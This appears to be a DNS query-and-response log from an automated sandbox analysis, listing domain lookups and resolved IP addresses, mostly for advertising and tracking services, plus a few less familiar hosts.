                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.191250086 CEST192.168.2.71.1.1.10x6c63Standard query (0)image2.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.191521883 CEST192.168.2.71.1.1.10x79daStandard query (0)image2.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.460195065 CEST192.168.2.71.1.1.10x6bd1Standard query (0)us-u.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.460195065 CEST192.168.2.71.1.1.10x9d5bStandard query (0)us-u.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.554686069 CEST192.168.2.71.1.1.10x2c40Standard query (0)pixel.tapad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.555114031 CEST192.168.2.71.1.1.10x82d4Standard query (0)pixel.tapad.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.709884882 CEST192.168.2.71.1.1.10x814cStandard query (0)sync.outbrain.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.710098028 CEST192.168.2.71.1.1.10x919eStandard query (0)sync.outbrain.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.970647097 CEST192.168.2.71.1.1.10x525dStandard query (0)ups.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.970946074 CEST192.168.2.71.1.1.10x94bStandard query (0)ups.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.012908936 CEST192.168.2.71.1.1.10xdc37Standard query (0)sync.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.014250994 CEST192.168.2.71.1.1.10x50b6Standard query (0)sync.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.047888041 CEST192.168.2.71.1.1.10x9f38Standard query (0)image2.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.048099041 CEST192.168.2.71.1.1.10x8819Standard query (0)image2.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.362816095 CEST192.168.2.71.1.1.10xf970Standard query (0)eb2.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.363018990 CEST192.168.2.71.1.1.10x585cStandard query (0)eb2.3lift.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.432934046 CEST192.168.2.71.1.1.10x8547Standard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.433109999 CEST192.168.2.71.1.1.10x6187Standard query (0)ib.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:16.923243999 CEST192.168.2.71.1.1.10x6447Standard query (0)eb2.3lift.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:16.923243999 CEST192.168.2.71.1.1.10xf05Standard query (0)eb2.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:17.381669998 CEST192.168.2.71.1.1.10x2bceStandard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:17.381879091 CEST192.168.2.71.1.1.10x2a86Standard query (0)ib.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:19.901065111 CEST192.168.2.71.1.1.10xf912Standard query (0)2500081.fs1.hubspotusercontent-na1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:19.901396990 CEST192.168.2.71.1.1.10x13cStandard query (0)2500081.fs1.hubspotusercontent-na1.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:21.602562904 CEST192.168.2.71.1.1.10xf7ceStandard query (0)2500081.fs1.hubspotusercontent-na1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:21.602844000 CEST192.168.2.71.1.1.10x50dStandard query (0)2500081.fs1.hubspotusercontent-na1.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:31.307626963 CEST192.168.2.71.1.1.10xa2c3Standard query (0)x.adroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:31.308013916 CEST192.168.2.71.1.1.10xf07fStandard query (0)x.adroll.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:31.996537924 CEST192.168.2.71.1.1.10x5954Standard query (0)secure.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:31.999635935 CEST192.168.2.71.1.1.10x598fStandard query (0)secure.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:23.756267071 CEST1.1.1.1192.168.2.70xbf7No error (0)hy.markkasmick.clickchaeynore.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:23.810525894 CEST1.1.1.1192.168.2.70xe7e4No error (0)hy.markkasmick.clickchaeynore.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:23.810525894 CEST1.1.1.1192.168.2.70xe7e4No error (0)chaeynore.com23.109.170.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:23.810525894 CEST1.1.1.1192.168.2.70xe7e4No error (0)chaeynore.com23.109.170.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:25.231012106 CEST1.1.1.1192.168.2.70xe7e8No error (0)p.jwalf.comadserver-2084671375.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:25.235755920 CEST1.1.1.1192.168.2.70xce9cNo error (0)p.jwalf.comadserver-2084671375.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:25.235755920 CEST1.1.1.1192.168.2.70xce9cNo error (0)adserver-2084671375.us-east-1.elb.amazonaws.com52.202.213.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:25.235755920 CEST1.1.1.1192.168.2.70xce9cNo error (0)adserver-2084671375.us-east-1.elb.amazonaws.com52.20.185.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:25.235755920 CEST1.1.1.1192.168.2.70xce9cNo error (0)adserver-2084671375.us-east-1.elb.amazonaws.com44.207.54.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:25.742212057 CEST1.1.1.1192.168.2.70xd659No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:25.742562056 CEST1.1.1.1192.168.2.70x4e8dNo error (0)www.google.com142.250.185.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:25.979868889 CEST1.1.1.1192.168.2.70x14fbNo error (0)my7recovery.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:25.979868889 CEST1.1.1.1192.168.2.70x14fbNo error (0)blogspot.l.googleusercontent.com142.250.185.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:25.980870962 CEST1.1.1.1192.168.2.70x9e58No error (0)my7recovery.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:27.485580921 CEST1.1.1.1192.168.2.70x6302No error (0)ald.my.id198.252.106.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:32.030292988 CEST1.1.1.1192.168.2.70xa9b0No error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:32.030292988 CEST1.1.1.1192.168.2.70xa9b0No error (0)googlehosted.l.googleusercontent.com142.250.185.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:32.031506062 CEST1.1.1.1192.168.2.70x8b9bNo error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:32.095865965 CEST1.1.1.1192.168.2.70xf4f1No error (0)s10.histats.coms10.histats.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:32.096858025 CEST1.1.1.1192.168.2.70xb370No error (0)s10.histats.coms10.histats.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:32.097846985 CEST1.1.1.1192.168.2.70x755aNo error (0)cdn.rawgit.comrawgitcdn.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:32.097846985 CEST1.1.1.1192.168.2.70x755aNo error (0)rawgitcdn.b-cdn.net169.150.236.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:32.100398064 CEST1.1.1.1192.168.2.70xe915No error (0)cdn.rawgit.comrawgitcdn.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.161250114 CEST1.1.1.1192.168.2.70x3e71No error (0)s4.histats.com149.56.240.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.161250114 CEST1.1.1.1192.168.2.70x3e71No error (0)s4.histats.com149.56.240.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.161250114 CEST1.1.1.1192.168.2.70x3e71No error (0)s4.histats.com149.56.240.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.161250114 CEST1.1.1.1192.168.2.70x3e71No error (0)s4.histats.com149.56.240.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.161250114 CEST1.1.1.1192.168.2.70x3e71No error (0)s4.histats.com54.39.128.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.161250114 CEST1.1.1.1192.168.2.70x3e71No error (0)s4.histats.com158.69.254.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.161250114 CEST1.1.1.1192.168.2.70x3e71No error (0)s4.histats.com54.39.156.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.161250114 CEST1.1.1.1192.168.2.70x3e71No error (0)s4.histats.com149.56.240.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.161250114 CEST1.1.1.1192.168.2.70x3e71No error (0)s4.histats.com149.56.240.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.161250114 CEST1.1.1.1192.168.2.70x3e71No error (0)s4.histats.com149.56.240.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.161250114 CEST1.1.1.1192.168.2.70x3e71No error (0)s4.histats.com149.56.240.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.161250114 CEST1.1.1.1192.168.2.70x3e71No error (0)s4.histats.com54.39.128.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.161250114 CEST1.1.1.1192.168.2.70x3e71No error (0)s4.histats.com142.4.219.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.173861027 CEST1.1.1.1192.168.2.70xe4e6No error (0)s10.histats.coms10.histats.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.173985958 CEST1.1.1.1192.168.2.70xafd4No error (0)s10.histats.coms10.histats.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.274661064 CEST1.1.1.1192.168.2.70x9e10No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.275111914 CEST1.1.1.1192.168.2.70x36e9No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.355679989 CEST1.1.1.1192.168.2.70xd66dNo error (0)googleads.g.doubleclick.net142.250.184.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.357414961 CEST1.1.1.1192.168.2.70x5383No error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.550498009 CEST1.1.1.1192.168.2.70xd2caNo error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.550498009 CEST1.1.1.1192.168.2.70xd2caNo error (0)googlehosted.l.googleusercontent.com172.217.16.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.553812027 CEST1.1.1.1192.168.2.70x288cNo error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.911722898 CEST1.1.1.1192.168.2.70x12eNo error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.911722898 CEST1.1.1.1192.168.2.70x12eNo error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.911722898 CEST1.1.1.1192.168.2.70x12eNo error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.911722898 CEST1.1.1.1192.168.2.70x12eNo error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.911722898 CEST1.1.1.1192.168.2.70x12eNo error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.913058996 CEST1.1.1.1192.168.2.70xab68No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.974426031 CEST1.1.1.1192.168.2.70xbff1No error (0)e.dtscout.com141.101.120.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.974426031 CEST1.1.1.1192.168.2.70xbff1No error (0)e.dtscout.com141.101.120.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.975248098 CEST1.1.1.1192.168.2.70xc454No error (0)e.dtscout.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.005760908 CEST1.1.1.1192.168.2.70x9cf6No error (0)s4.histats.com149.56.240.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.005760908 CEST1.1.1.1192.168.2.70x9cf6No error (0)s4.histats.com149.56.240.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.005760908 CEST1.1.1.1192.168.2.70x9cf6No error (0)s4.histats.com149.56.240.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.005760908 CEST1.1.1.1192.168.2.70x9cf6No error (0)s4.histats.com149.56.240.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.005760908 CEST1.1.1.1192.168.2.70x9cf6No error (0)s4.histats.com149.56.240.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.005760908 CEST1.1.1.1192.168.2.70x9cf6No error (0)s4.histats.com149.56.240.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.005760908 CEST1.1.1.1192.168.2.70x9cf6No error (0)s4.histats.com54.39.128.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.005760908 CEST1.1.1.1192.168.2.70x9cf6No error (0)s4.histats.com149.56.240.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.005760908 CEST1.1.1.1192.168.2.70x9cf6No error (0)s4.histats.com142.4.219.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.005760908 CEST1.1.1.1192.168.2.70x9cf6No error (0)s4.histats.com158.69.254.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.005760908 CEST1.1.1.1192.168.2.70x9cf6No error (0)s4.histats.com54.39.156.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.005760908 CEST1.1.1.1192.168.2.70x9cf6No error (0)s4.histats.com54.39.128.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.005760908 CEST1.1.1.1192.168.2.70x9cf6No error (0)s4.histats.com149.56.240.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.173728943 CEST1.1.1.1192.168.2.70xeb80No error (0)t.dtscout.com141.101.120.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.173728943 CEST1.1.1.1192.168.2.70xeb80No error (0)t.dtscout.com141.101.120.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.174217939 CEST1.1.1.1192.168.2.70x6326No error (0)t.dtscout.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.193017006 CEST1.1.1.1192.168.2.70xdba1No error (0)pxdrop.lijit.coma24365-c026.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.193120956 CEST1.1.1.1192.168.2.70x7ad4No error (0)pxdrop.lijit.coma24365-c026.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.193175077 CEST1.1.1.1192.168.2.70xef2No error (0)cdn.tynt.comcdn.tynt.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.193361044 CEST1.1.1.1192.168.2.70x6a9aNo error (0)cdn.tynt.comcdn.tynt.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.193402052 CEST1.1.1.1192.168.2.70x58cdNo error (0)pd.sharethis.comthirdparty-logserver-lb.global.unified-prod.sharethis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.193402052 CEST1.1.1.1192.168.2.70x58cdNo error (0)thirdparty-logserver-lb.global.unified-prod.sharethis.net52.59.151.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.193402052 CEST1.1.1.1192.168.2.70x58cdNo error (0)thirdparty-logserver-lb.global.unified-prod.sharethis.net35.156.11.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.193402052 CEST1.1.1.1192.168.2.70x58cdNo error (0)thirdparty-logserver-lb.global.unified-prod.sharethis.net3.74.183.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.193557024 CEST1.1.1.1192.168.2.70x376cNo error (0)pd.sharethis.comthirdparty-logserver-lb.global.unified-prod.sharethis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.204220057 CEST1.1.1.1192.168.2.70x70e0No error (0)t.dtscout.com141.101.120.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.204220057 CEST1.1.1.1192.168.2.70x70e0No error (0)t.dtscout.com141.101.120.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.205235958 CEST1.1.1.1192.168.2.70x4142No error (0)t.dtscout.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.878654003 CEST1.1.1.1192.168.2.70x930No error (0)googleads.g.doubleclick.net142.250.185.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.880518913 CEST1.1.1.1192.168.2.70x9224No error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:36.348017931 CEST1.1.1.1192.168.2.70xf494No error (0)ic.tynt.com67.202.105.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:36.348017931 CEST1.1.1.1192.168.2.70xf494No error (0)ic.tynt.com67.202.105.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:36.382610083 CEST1.1.1.1192.168.2.70x82a8No error (0)t.sharethis.comcert1.a1.atm.aqfer.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:36.385982037 CEST1.1.1.1192.168.2.70x1d13No error (0)pxdrop.lijit.coma24365-c026.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:36.387734890 CEST1.1.1.1192.168.2.70x214cNo error (0)pxdrop.lijit.coma24365-c026.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:36.393337011 CEST1.1.1.1192.168.2.70x831cNo error (0)t.sharethis.comcert1.a1.atm.aqfer.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:36.543138027 CEST1.1.1.1192.168.2.70x35c3No error (0)de.tynt.com67.202.105.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:36.543138027 CEST1.1.1.1192.168.2.70x35c3No error (0)de.tynt.com67.202.105.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.025585890 CEST1.1.1.1192.168.2.70x9bf7No error (0)tags.crwdcntrl.net65.9.66.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.025585890 CEST1.1.1.1192.168.2.70x9bf7No error (0)tags.crwdcntrl.net65.9.66.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.025585890 CEST1.1.1.1192.168.2.70x9bf7No error (0)tags.crwdcntrl.net65.9.66.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.025585890 CEST1.1.1.1192.168.2.70x9bf7No error (0)tags.crwdcntrl.net65.9.66.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.047894001 CEST1.1.1.1192.168.2.70x7583No error (0)t.dtscdn.com104.26.12.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.047894001 CEST1.1.1.1192.168.2.70x7583No error (0)t.dtscdn.com104.26.13.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.047894001 CEST1.1.1.1192.168.2.70x7583No error (0)t.dtscdn.com172.67.74.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.047980070 CEST1.1.1.1192.168.2.70x35d9No error (0)t.dtscdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.048171043 CEST1.1.1.1192.168.2.70x18b3No error (0)pixel.onaudience.com148.113.153.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.048171043 CEST1.1.1.1192.168.2.70x18b3No error (0)pixel.onaudience.com54.38.113.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.048171043 CEST1.1.1.1192.168.2.70x18b3No error (0)pixel.onaudience.com54.38.113.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.048171043 CEST1.1.1.1192.168.2.70x18b3No error (0)pixel.onaudience.com54.38.113.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.048171043 CEST1.1.1.1192.168.2.70x18b3No error (0)pixel.onaudience.com54.38.113.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.048171043 CEST1.1.1.1192.168.2.70x18b3No error (0)pixel.onaudience.com54.38.113.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.048171043 CEST1.1.1.1192.168.2.70x18b3No error (0)pixel.onaudience.com54.38.113.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.048171043 CEST1.1.1.1192.168.2.70x18b3No error (0)pixel.onaudience.com54.38.113.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.048171043 CEST1.1.1.1192.168.2.70x18b3No error (0)pixel.onaudience.com148.113.153.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.175285101 CEST1.1.1.1192.168.2.70xb7adNo error (0)fundingchoicesmessages.google.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.175285101 CEST1.1.1.1192.168.2.70xb7adNo error (0)www3.l.google.com142.250.185.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.175883055 CEST1.1.1.1192.168.2.70xa711No error (0)fundingchoicesmessages.google.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.344805002 CEST1.1.1.1192.168.2.70xf937No error (0)i.simpli.fi35.204.89.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.344805002 CEST1.1.1.1192.168.2.70xf937No error (0)i.simpli.fi35.234.162.151A (IP address)IN (0x0001)false
